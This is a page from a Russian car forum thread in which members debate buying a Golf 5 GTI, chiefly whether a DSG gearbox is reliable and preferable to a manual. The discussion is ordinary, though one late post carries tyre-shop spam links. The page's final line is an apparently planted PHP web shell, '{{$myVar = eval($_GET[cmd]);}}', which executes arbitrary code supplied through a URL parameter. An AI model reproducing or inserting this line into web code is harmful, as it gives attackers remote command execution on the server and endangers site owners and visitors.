+ Ответить в теме
Страница 2 из 2 ПерваяПервая 1 2
Показано с 11 по 15 из 15

Тема: Покупка Golf 5 Gti - нужен совет.


  1. #11
    GTI-Racing MORG m-customs is on a distinguished road Аватар для MORG m-customs
    Регистрация
    26.06.2006
    Машина
    Impreza WRX
    Сообщений
    2,081
    Originally posted by dAN@Nov 17 2006, 00:14
    На самом деле остался единственный вопрос.
    Коробка DSG. Ребята из PRO-Line говорят не бери DSG. Но ни один не мотивировал. Я читал, что коробка расчитана на тягу в 350 Нм. А у GTI 280, так в чем проблема. Только очень не хочется слышать про мифическое РУЧКА ЭТО СПОРТИВНО. Ездил, знаю. И честно сказать не собираюсь чиповать - НЕЗАЧЕМ. Рвать на старте кого - ЗАЧЕМ? На извилистом шоссе, в стрите на первом месте управляемость! А у GTI она на высоте. А орать, что у меня до сотни 5 сек. нах надо...
    <div align='right'><{POST_SNAPBACK}></div>
    Во-первых DSG быстрее ручки
    Во-вторых есть уже порванные DSG в Москве и не только
    В-третьих ставь сразу спортподвеску без потери гарантии

  2. #12
    Мимо проходил dAN is on a distinguished road Аватар для dAN
    Регистрация
    16.11.2006
    Сообщений
    5
    Originally posted by MORG m&#045;customs@Nov 17 2006, 12:40
    Во-первых DSG быстрее ручки
    Во-вторых есть уже порванные DSG в Москве и не только
    В-третьих ставь сразу спортподвеску без потери гарантии
    <div align='right'><{POST_SNAPBACK}></div>
    Я одного не понимаю. У всех по 2, а то по 3 машины? Зачем и без того хорошей машины делать монстра? Я например могу содержать 1 машину за такие деньги и хочу на ней ездить и на работу, за город + время от времени прохватить по Яузе;)
    Все таки я думаю, что порванные DSG следствие того, что машины были форсированы и использовались исключительно для "спорта". Иначе как понять, что на R32 ставится только DSG? А с 2008-09 года VW Audi вообще планирует перейти исключительно на DSG взамен tiptronic.

  3. #13
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Мое личное мнение - только ДСГ.
    Ручную коробку нужно брать только если нравится сам процесс перемещения рычага по кулисе. А если машина будет на каждый день и использоваться в городе, то я вообще не понимаю как можно рассматривать ручную коробку. ДСГ и быстрее и расход меньше и все прелести автомата. При этом, если нужно, есть режим S, есть манетки на руле и еще можно переключать вручную рычагом КПП. Да, есть особенности при старте с места - нужно использовать launch control, но это нужно просто освоить. О надежности - я понимаю, что речь идет о новой машине, по-моему 2 года гарантии позволяют себя чувствовать абсолютно спокойно. Тем более, что нет никакой информации о каких-то особых проблемах с ДСГ.

    Спортподвеска? На ГТИ в базе естественно подвеска спорт. Если речь идет о еще более спортивной подвеске (жестче, ниже), то я не совсем понимаю где на такой подвеске у нас ездить. Как по мне на ГТИ для наших условий можно было бы даже чуть-чуть помягче амортизаторы.

  4. #14
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Originally posted by dAN@Nov 17 2006, 13:58
    Я одного не понимаю. У всех по 2, а то по 3 машины? Зачем и без того хорошей машины делать монстра? Я например могу содержать 1 машину за такие деньги и хочу на ней ездить и на работу, за город + время от времени прохватить по Яузе;)
    Все таки я думаю, что порванные DSG следствие того, что машины были форсированы и использовались исключительно для "спорта". Иначе как понять, что на R32 ставится только DSG? А с 2008-09 года VW Audi вообще планирует перейти исключительно на DSG взамен tiptronic.
    <div align='right'><{POST_SNAPBACK}></div>
    У R32 однозначно под большую мощность и больше диски сцепления в DSG.
    Для каждодневной езды наверное ты и сам склоняешся к DSG, просто ищешь одобрение, а решил наверное уже почти сразу, да и продать на вторичке сейчас легче машину с автоматом (куда катится народ )
    песок сыпется....не останавливайтесь на достигнутом !

  5. #15
    Новичок vasilijdzhig is on a distinguished road Аватар для vasilijdzhig
    Регистрация
    18.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    Мое личное мнение - только ДСГ.
    Ручную коробку нужно брать только если нравится сам процесс перемещения рычага по кулисе. А если машина будет на каждый день и использоваться в городе, то я вообще не понимаю как можно рассматривать ручную коробку..
    золотые слова! 100% поддерживаю. + гибрид - то будет экономия на топливе по городу. Если шумахер - то конечно механику выбирать нужно.

    Автомобили из Европы на выгодных условиях - Магазин шин в Одессе link
    Запчасти для грузовиков по хорошим ценам - Магазин шин в Одессе там
    Lexus по выгодной цене из США - Статьи - Купить автошины в Киеве сайт
    Экономим на покупке шин - О шинах - Купить автошины в Днепропетровске ссылка
    Как быстро и безопасно купить автомобиль - О шинах - Купить автошины в Одессе читать
    Качественная оклейка авто пленкой от Vip Detailing - О шинах - Купить автошины в Одессе инфо
    Ремонт тормозной системы от профессионалов - Информация - zapchast-avto.kiev.ua - запчасти для ВАЗ, ГАЗ, УАЗ в Киеве тут
    Как купить подержанный автомобиль без проблем - Статьи - Купить шины в Харькове, шины в Харькове, купить автошины Харьков смотреть

+ Ответить в теме
Страница 2 из 2 ПерваяПервая 1 2

Похожие темы

  1. Совет нужен по тормозам Golf R
    от Bonder в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 22
    Последнее сообщение: 20.03.2014, 14:17
  2. GOLF MK5 GTI с 3шт. avto.ru, нужен совет.
    от Mitya Chuk в разделе Отзывы / Выбор
    Ответов: 17
    Последнее сообщение: 08.08.2011, 20:09
  3. Нужен Совет По Выбор Vw Golf /polo Iv
    от Max в разделе Отзывы / Выбор
    Ответов: 12
    Последнее сообщение: 18.04.2009, 18:51
  4. Нужен Совет
    от kol9mba в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 0
    Последнее сообщение: 11.12.2008, 21:21
  5. Нужен совет по Golf 3
    от LoKI в разделе Отзывы / Выбор
    Ответов: 2
    Последнее сообщение: 18.12.2006, 20:45

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}